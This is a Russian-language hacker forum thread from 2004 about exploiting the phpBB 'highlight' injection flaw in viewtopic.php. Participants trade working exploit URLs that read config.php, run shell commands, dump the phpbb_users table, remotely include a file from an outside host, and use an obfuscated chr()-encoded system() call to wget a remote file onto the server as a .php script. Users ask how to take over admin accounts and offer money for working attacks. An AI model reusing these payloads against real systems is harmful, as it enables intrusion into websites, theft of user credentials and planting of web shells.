| Цитата |
|---|
| DDD пишет: блин, какие проблемы? разжОвываю для особо ленивых: 3) делаешь дамп: mysqldump%20-uusername%20-ppassword%20dbname%20phpbb_users ищешь ID своего юзера |
просто в 4 шаге вместо своего user_id указываешь свой username
SQL-инъекция и php инклудинг в phpBB
|
28.11.2004 14:07:31
можно ломануть (и ломанули уже...) [IMG][/IMG]
|
|
|
|
|
|
28.11.2004 17:20:05
2 Clone ну, никто и не спорит. я...как это по-научному... - "скрипт-кидди" в таких вопросах лично у меня не получилось составить рабочий урл с символами кавычки, обрамляющими текстовый аргумент. вот и пришлось поизвращаться |
|||
|
|
|
|
29.11.2004 10:40:46
Не морочтесь с SQL запросами, почти на каждом сайте/хостере стоит PhpMyAdmin (pma). Найдите каталог с ПМА и делайте что хотите... Как правило пароль на ПМА тот же что и в phpbb/config.php...
gl |
|
|
|
|
|
29.11.2004 15:29:30
Например, преходя по адресу <font color=BLUE> viewtopic.php?t=5&highlight=%2527.$poster=show_source(%2527c onfig.php%2527).%2527</font>, вижу:
<font color=RED>Warning: show_source(config\.php): failed to open stream: No such file or directory in /home/httpd/vhosts/***.ru/httpdocs/b/viewtopic.php(1214) : regexp code on line 1 Warning: show_source(): Failed opening 'config\.php' for highlighting in /home/httpd/vhosts/***.ru/httpdocs/b/viewtopic.php(1214) : regexp code on line 1</font> Как сделать, что б перед точкой не ставилась слэш? И можно ли выполнять команды при SafeMode=ON? |
|
|
|
|
|
29.11.2004 18:15:27
Короче, user_id, если я не ошибаюсь, можно найти в хидден-поле с одноимённым названием на странице профиля.
|
|
|
|
|
|
29.11.2004 21:18:09
Ладно, короче сам частично отвечаю на свой первый и второй вопрос:
1. Можно сделать так: <font color=BLUE> viewtopic.php?t=5&highlight=%2527%252ehighlight_file($file)% 252e%2527&file=config.php</font> и всё будет ок! В пхпББ обычно есть дира <font color=RED>images/avatars/</font>, у которой права 777, как в неё реально залить файл с другого сайта? 2. При включённом сайф моде можно проделать с <font color=RED>highlight_file($file)</font>, тоже самое, но только в приделах форумского каталога!? [IMG][/IMG] И типа <font color=RED>system($cmd)</font> похоже совсем не работает... Что ещё можно сделать??? |
|
|
|
|
|
04.12.2004 19:51:04
|
|||
|
|
|
|
04.12.2004 20:01:56
dBorj:
>В пхпББ обычно есть дира images/avatars/, у которой права >777, как в неё реально залить файл с другого сайта? А чем тебя не устраивает директория /tmp? >И типа system($cmd) похоже совсем не работает... Можно делать следующие запросы: viewtopic.php?t=31337&highlight=%2527.$poster=%60ls%09-la%60 .%2527 |
|
|
|
|
|
05.12.2004 00:01:20
2.Всё равно: Warning: shell_exec(): Cannot execute using backquotes in Safe Mode in /home/kolpashe/public_html/forum/viewtopic.php(1104) : regexp code on line 1 |
|||
|
|
|
|
05.12.2004 10:16:41
dBorj:
>Ну, залью в /tmp, а что дальше? Дальнейшие действия зависят только от тебя самого >Икак можно зальть одной командой, кроме, как copy()? wget, ftp, echo |
|
|
|
|
|
05.12.2004 12:23:22
|
|||||
|
|
|
|
05.12.2004 17:40:43
dBorj:
>Ну, например? Можно использовать локальный эксплойт для повышения прав в системе. >Приведи плиз работающию команду wget'а Набери в Яндексе () "как пользоваться wget". Говорят помогает. |
|
|
|
|
|
05.12.2004 18:30:10
Если всё же есть дира с правами записи для тебя, но ф-ия copy() не работает можно закачать файл в диру wget'ом, токо тогда желательно закодировать все параметры в ascii коде. Например:
&highlight=%2527%252esystem(chr(119).chr(103).chr(101).chr(1 16).chr(32).chr(45).chr(79).chr(32).chr(47).chr(239).chr(243 ).chr(242).chr(252).chr(47).chr(234).chr(47).chr(237).chr(24 3).chr(230).chr(237).chr(238).chr(236).chr(243).chr(47).chr( 244).chr(224).chr(233).chr(235).chr(243).chr(46).chr(112).ch r(104).chr(112).chr(32).chr(104).chr(116).chr(116).chr(112). chr(58).chr(47).chr(47).chr(236).chr(238).chr(233).chr(46).c hr(241).chr(224).chr(233).chr(242).chr(47).chr(244).chr(224) .chr(233).chr(235).chr(46).chr(104).chr(116).chr(109))%252e% 2527 Выполнит каманду: "system(wget -O /путь/к/нужному/файлу.php http://мой.сайт/файл.htm)". И загрузит файл "файл.htm" в папку "/путь/к/нужному/файлу" с расширением "php" |
|
|
|
|
|
16.12.2004 15:43:04
А в phpBB 2.0.11 уже пофиксили эту дыру?
|
|
|
|
|
|
16.12.2004 17:07:33
|
|||
|
|
|
|
16.12.2004 18:53:59
5,6 непойму [IMG][/IMG] Кто мне на мыло даст рабочую версию выполнения запросов я заплочу 10вм. mysqldump получаю. А изменить что нибудь в базе неполучается. как скажем сделать это: UPDATE users SET password='passord' where iduser=188 еще вот этим &highlight=%2527.$poster=include($_GET[IMG][/IMG]).%2527&lol=http://cyberlords.net/rem.txt?&id; вижу rem.txt с файлами и т.д на странице но использовать ничего немогу есть толк какой то от этого. может в удалённый фаил запрос написать и заинклудить? а запрос как грамотно написать. wget неполучается help plz моё мыло badstan@gmail.com |
|||
|
|
|
|
16.12.2004 23:27:54
vse ya sam razobralsya
|
|
|
|
|
|
17.12.2004 12:43:50
А если папку admin закрыть паролем, то можно ли с помощью этой дыры получить доступ к админке?
|
|
|
|
|
|
26.12.2004 17:35:59
Народ, вот я получил логин, пароль и имя б\д. Как теперь мне это заюзать? как получить лог и пасс админа форума?
|
||||
|
|
|
|||
Читают тему